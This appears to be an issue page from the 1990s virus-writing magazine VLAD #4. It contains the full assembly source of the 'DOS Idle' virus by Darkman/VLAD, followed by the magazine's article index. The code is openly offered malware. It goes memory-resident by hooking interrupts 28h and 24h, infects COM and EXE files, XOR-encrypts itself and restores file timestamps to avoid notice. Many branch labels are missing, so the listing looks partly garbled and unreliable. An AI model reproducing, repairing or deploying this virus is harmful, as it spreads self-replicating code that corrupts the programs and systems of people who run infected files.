Virus Labs & Distribution
VLAD #4 - DOS Idle

;                             Darkman/VLAD
;                           Proudly Presents
;                           D O S   I D L E

dos_idle     segment
             assume  cs:dos_idle,ds:dos_idle,es:dos_idle
             org     00h

             call    viruscode
virusid      db      'DI'                ; DOS Idle Scan-ID
xorcrypt     proc    near                ; XOR Encrypt/Decrypt
             mov     cx,(codeend-crypt)/02h
xorwordptr   db      2eh,81h,35h         ; xor word ptr cs:[di],????h \
cryptvalues  dw      ?                   ;  "   "    "        "       /
             inc     di                  ; Increase DI
             inc     di                  ; Increase DI
             loop    cryptcode
             ret                         ; Return!
             pop     bp                  ; Load BP from stack
             sub     bp,offset virusid   ; BP = delta offset

             push    ds                  ; Save DS at stack
             push    es                  ; Save ES at stack

             lea     di,[bp+crypt]       ; DI = offset of crypt
             call    xorcrypt
             mov     ax,6303h            ; DOS Idle service
             int     28h                 ; Do it!
             cmp     ax,bx               ; Already resident?
             je      diexit              ; Equal? Jump to diexit

             mov     ax,es
             dec     ax                  ; Decrease AX
             mov     ds,ax               ; DS = segment of programs MCB

             cmp     byte ptr ds:[00h],'Z'
             jne     diexit              ; Not last in chain? Jump to diexit
             sub     word ptr ds:[03h],((02h*(codeend-code))+(memoryend-codeend)+0fh)/10h
             sub     word ptr ds:[12h],((02h*(codeend-code))+(memoryend-codeend)+0fh)/10h
             add     ax,ds:[03h]         ; AX = MCB + size of memory block
             inc     ax                  ; AX = first usable MCB segment

             cld                         ; Clear direction flag
             push    cs                  ; Save CS at stack
             pop     ds                  ; Load DS from stack (CS)
             mov     es,ax               ; ES = first usable program segment
             mov     cx,(codeend-code)   ; Move 692 bytes
             xor     di,di               ; Clear DI
             lea     si,[bp+code]        ; SI = offset of code
             rep     movsb               ; Move virus to high memory

             xor     ax,ax               ; Clear AX
             mov     ds,ax               ; DS = segment of interrupt table
             xchg    ax,ds:[28h*04h]     ; Load and store offset of INT 28h
             mov     es:[int28off],ax    ; Store offset of INT 28h
             mov     ax,1eh              ; AX = segment of hole in memory
             xchg    ax,ds:[28h*04h+02h] ; Load and store segment of INT 28h
             mov     es:[int28seg],ax    ; Store segment of INT 28h

             mov     byte ptr ds:[1e0h],0eah
             mov     word ptr ds:[1e1h],offset virusint28
             mov     ds:[1e3h],es        ; Store segment of virusint28
             pop     es                  ; Load ES from stack
             pop     ds                  ; Load DS from stack

             cmp     [bp+infectext],00h  ; Infected a COM file?
             jne     exeexit             ; Not equal? Jump to exeexit

             mov     di,100h             ; DI = beginning of code
             lea     si,[bp+headercode]  ; SI = offset of headercode
             push    di                  ; Restore Instruction Pointer (IP)
             movsw                       ; Move the real code to beginning \
             movsw                       ;  "    "   "    "   "      "      >
             movsb                       ;  "    "   "    "   "      "     /

             call clearregs
             mov     ax,bx               ; Clear AX

             ret                         ; Return!
             mov     ax,es
             add     ax,10h              ; Beginning of EXE file
             add     word ptr cs:[bp+csip+02h],ax

             call    clearregs

             cli                         ; Clear interrupt-enable flag
             mov     sp,word ptr cs:[bp+sssp]
             add     ax,word ptr cs:[bp+sssp+02h]
             mov     ss,ax
             sti                         ; Store interrupt-enable flag

             mov     ax,bx               ; Clear AX

             db      0eah                ; Object code of jump far
csip         dd      0fff00000h          ; CS:IP of infected file
sssp         dd      ?                   ; SS:SP of infected file

virusint28   proc    near                ; Interrupt 28h of DOS Idle
             cmp     ax,6303h            ; DOS Idle service?
             jne     getfilename         ; Not equal? Jump to getfilename

             mov     bx,ax
             iret                        ; Interrupt return!
             push    ax                  ; Save AX at stack
             push    bx                  ; Save BX at stack
             push    cx                  ; Save CX at stack
             push    dx                  ; Save DX at stack
             push    di                  ; Save DI at stack
             push    si                  ; Save SI at stack
             push    bp                  ; Save BP at stack
             push    ds                  ; Save DS at stack
             push    es                  ; Save ES at stack

             mov     ah,62h              ; Get PSP address
             int     21h                 ; Do it!

             mov     ds,bx               ; DS = Program Segment Prefix (PSP)
             mov     es,ds:[2ch]         ; ES = Environment segment

             cld                         ; Clear direction flag
             xor     ax,ax               ; Clear AX
             mov     di,ax               ; Clear DI
             inc     di                  ; Increase DI
             dec     di                  ; Decrease DI
             scasw                       ; Search for the filename
             jne     findname            ; Not equal? Jump to findname

             scasw                       ; DI = offset of filename

             xor     ax,ax               ; Clear AX
             mov     ds,ax               ; DS = segment of interrupt table
             push    ds:[24h*04h]        ; Save INT 24h offset at stack
             push    ds:[24h*04h+02h]    ; Save INT 24h segment at stack
             mov     word ptr ds:[24h*04h],offset virusint24
             mov     ds:[24h*04h+02h],cs ; Intercept interrupt 24h

             mov     ax,3d00h            ; Open file (read)
             mov     dx,di
             push    es                  ; Save ES at stack
             pop     ds                  ; Load DS from stack (ES)
             int     21h                 ; Do it!
             jnc     getfileinfo         ; No error? Jump to getfileinfo
             jmp     int28exit
             xchg    ax,bx               ; Exchange AX with BX

             mov     ax,1220h            ; Get system file table number
             int     2fh                 ; Do it! (multiplex)

             push    bx                  ; Save BX at stack
             mov     ax,1216h            ; Get address of system FCB
             mov     bl,es:[di]          ; BL = system file table entry
             int     2fh                 ; Do it! (multiplex)
             pop     bx                  ; Load BX from stack

             mov     byte ptr es:[di+02h],02h

             mov     ah,3fh              ; Read from file
             mov     cx,19h              ; Read 25 bytes
             push    cs                  ; Save CS at stack
             pop     ds                  ; Load DS from stack (CS)
             lea     dx,headercode       ; DX = offset of headercode
             int     21h                 ; Do it!

             mov     si,dx

             mov     ax,5700h            ; Get files date/time
             int     21h                 ; Do it!
             push    cx                  ; Save CX at stack
             push    dx                  ; Save DX at stack

             mov     ax,es:[di+28h]      ; Get the extension of the file
             mov     cl,es:[di+2ah]      ;  "   "      "     "   "   "

             cmp     ax,'OC'             ; COM file?
             jne     checkexe            ; Not equal? Jump to checkexe
             cmp     cl,'M'              ; COM file?
             jne     checkexe            ; Not equal? Jump to checkexe

             mov     ax,word ptr headercode
             cmp     ax,'MZ'             ; Renamed EXE file?
             je      infectexit          ; Equal? Jump to infectexit
             cmp     ax,'ZM'             ; Renamed EXE file?
             je      infectexit          ; Equal? Jump to infectexit
             cmp     word ptr [si+03h],'ID'
             je      infectexit          ; Infected? Jump to infectexit

             mov     ax,es:[di+11h]      ; AX = file size

             cmp     ax,05h              ; AX = 5? (AX < 5)
             jb      infectexit          ; Below? Jump to infectexit
             cmp     ax,(65535-(codeend-code))
             ja      infectexit          ; Above? Jump to infectexit

             mov     word ptr es:[di+15h],00h

             sub     ax,03h              ; AX = offset of virus code
             mov     word ptr infectcode+01h,ax

             mov     [infectext],00h     ; Infect a COM file

             mov     cx,05h              ; Write 5 bytes
             lea     dx,infectcode       ; DX = offset of infectcode

             jmp     writevirus
             jmp     closefile
             cmp     ax,'XE'             ; EXE file?
             jne     infectexit          ; Not equal? Jump to infectexit
             cmp     cl,'E'              ; EXE file?
             jne     infectexit          ; Not equal? Jump to infectexit

             mov     ax,word ptr headercode
             cmp     ax,'MZ'             ; Renamed EXE file?
             je      infectexe           ; Equal? Jump to infectexe
             cmp     ax,'ZM'             ; Renamed EXE file?
             je      infectexe           ; Equal? Jump to infectexe
             jmp     infectcom
             cmp     word ptr [si+12h],'ID'
             je      infectexit          ; Equal? Jump to infectexit

             cmp     byte ptr [si+18h],40h
             je      infectexit          ; Windows file? Jump to infectexit

             push    bx                  ; Save BX at stack

             mov     bx,es:[di+11h]      ; Get filesize of file
             mov     cx,es:[di+13h]      ;  "     "     "   "

             cmp     word ptr [si+02h],00h
             je      dontdecpage         ; Equal? Jump to dontdecpage

             dec     word ptr [si+04h]   ; Decrease pages in file
             mov     ax,200h
             mul     word ptr [si+04h]   ; Divide by pages
             add     ax,[si+02h]         ; Add bytes on last page
             adc     dx,00h              ; Convert to 32 bit

             cmp     ax,bx               ; Internal overlay?
             pop     bx                  ; Load bytes from stack
             jne     infectexit          ; Not equal? Jump to infectexit
             cmp     cx,dx               ; Internal overlay?
             jne     infectexit          ; Not equal? Jump to infectexit

             push    ax                  ; Save AX at stack
             push    dx                  ; Save DX at stack

             push    si                  ; Save SI at stack

             push    cs                  ; Save CS at stack
             pop     es                  ; Load ES from stack (CS)

             add     si,0eh              ; SI = offset of SS:SP
             lea     di,sssp             ; DI = offset of sssp

             movsw                       ; Store original SP
             movsw                       ; Store original SS

             inc     si                  ; SI = offset of CS:IP \
             inc     si                  ; "  "   "    "    "   /
             lea     di,csip             ; DI = offset of csip

             movsw                       ; Store original IP
             movsw                       ; Store original CS

             pop     si                  ; Load SI from stack

             mov     cx,10h
             div     cx                  ; Convert bytes to paragraphs

             sub     ax,word ptr [si+08h]

             mov     word ptr [si+14h],dx
             mov     word ptr [si+16h],ax

             add     ax,((02h*(codeend-code))+(memoryend-codeend)+0fh)/10h

             mov     word ptr [si+0eh],ax

             pop     dx                  ; Load DX from stack
             pop     ax                  ; Load AX from stack

             add     ax,(codeend-code)   ; Add the length of the virus
             adc     dx,00h              ; Convert to 32 bit

             mov     cx,200h
             div     cx                  ; Divide by pages

             or      dx,dx               ; No bytes on last page?
             je      dontfixpage         ; Equal? Jump to dontfixpage

             inc     ax                  ; Increase AX
             mov     word ptr [si+04h],ax
             mov     word ptr [si+02h],dx

             mov     word ptr [si+12h],'ID'

             mov     ax,4200h            ; Move file pointer to the beginning
             cwd                         ; Clear DX
             mov     cx,dx               ; Clear CX
             int     21h                 ; Do it!

             mov     [infectext],01h     ; Infect a EXE file

             mov     cx,18h              ; Write 24 bytes
             mov     dx,si               ; DX = offset of exeheader
             mov     ah,40h              ; Write to file
             int     21h                 ; Do it!

             mov     ax,4202h            ; Move file pointer to the end
             cwd                         ; Clear DX
             mov     cx,dx               ; Clear CX
             int     21h                 ; Do it!
             in      ax,40h              ; AX = port 40h

             or      ax,ax               ; Poor encryption value?
             je      getvalue            ; Equal? Jump to getvalue

             mov     cryptvalues,ax      ; Store the crypt values

             mov     cx,(codeend-code)   ; Move 692 bytes
             lea     di,codeend          ; DI = offset of codeend
             lea     si,code             ; SI = offset of code
             push    cs                  ; Save CS at stack
             pop     es                  ; Load ES from stack (CS)
             rep     movsb               ; Move virus to high memory

             lea     di,codeend+20h      ; DI = offset of crypt
             xor     bp,bp               ; Clear BP
             call    xorcrypt

             mov     ah,40h              ; Write to file
             mov     cx,(codeend-code)   ; Write 692 bytes
             lea     dx,codeend          ; DX = offset of codeend
             int     21h                 ; Do it!
             mov     ax,5701h            ; Set files date/time
             pop     dx                  ; Load DX from stack
             pop     cx                  ; Load CX from stack
             int     21h                 ; Do it!

             mov     ah,3eh              ; Close file
             int     21h                 ; Do it!
             xor     ax,ax               ; Clear AX
             mov     ds,ax               ; DS = segment of interrupt table
             pop     ds:[24h*04h]        ; Save INT 24h offset at stack
             pop     ds:[24h*04h+02h]    ; Save INT 24h segment at stack

             pop     es                  ; Save ES at stack
             pop     ds                  ; Save DS at stack
             pop     bp                  ; Save BP at stack
             pop     si                  ; Save SI at stack
             pop     di                  ; Save DI at stack
             pop     dx                  ; Save DX at stack
             pop     cx                  ; Save CX at stack
             pop     bx                  ; Save BX at stack
             pop     ax                  ; Save AX at stack

             db      0eah                ; Object code of jump far
int28off     dw      ?                   ; Offset of interrupt 28h
int28seg     dw      ?                   ; Segment of interrupt 28h

virusint24   proc    near                ; Interrupt 24h of Replicator
             mov     al,3                ; Fail system call in progress
             iret                        ; Interrupt return!

clearregs    proc    near                ; Clear all registers
             xor     bx,bx               ; Clear BX
             mov     cx,bx               ; Clear CX
             mov     dx,bx               ; Clear DX
             mov     di,bx               ; Clear DI
             mov     si,bx               ; Clear SI
             mov     bp,bx               ; Clear BP
             ret                         ; Return!

virusname    db      ' [DOS Idle]'       ; Name of the virus
virusauthor  db      ' [Darkman/VLAD] '  ; Author of the virus
infectext    db      ?                   ; Extension of infected file
infectcode   db      0e9h,?,?,'DI'       ; New code of infected COM file
headercode   db      0cdh,20h,?,?,?      ; Header of COM/EXE
exeheader    db      14h dup(?)          ; Header of EXE

dos_idle     ends
end          code

ARTICLE.0_0       Hidden Area Story By QuantumG


ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag


Tax Office
ARTICLE.2_2       Fight Back!
ARTICLE.2_3       Interviews
ARTICLE.2_4       Cryptanalysis
ARTICLE.2_5       Slovakia
ARTICLE.2_6       TBMem Flaws
ARTICLE.2_7       F-Prot Troubles


Win Infection
ARTICLE.3_2       WinVir14 Disasm
ARTICLE.3_3       Andropinis
ARTICLE.3_4       Super Virus-2
ARTICLE.3_5       VTBoot
ARTICLE.3_6       Ebbelwoi VQ7
ARTICLE.3_7       Unix Viruses


Virus Descriptions
ARTICLE.4_2       Ender Wiggin
ARTICLE.4_3       WinSurfer
ARTICLE.4_4       Antipode 2.0
ARTICLE.4_5       Bane
ARTICLE.4_7       Tasha Yar


ARTICLE.5_2       ART v2.2
ARTICLE.5_3       Good Times!
ARTICLE.5_4       DOS Idle
ARTICLE.5_5       Neither
ARTICLE.5_6       Virus Scripts
ARTICLE.5_7       What's Next ?

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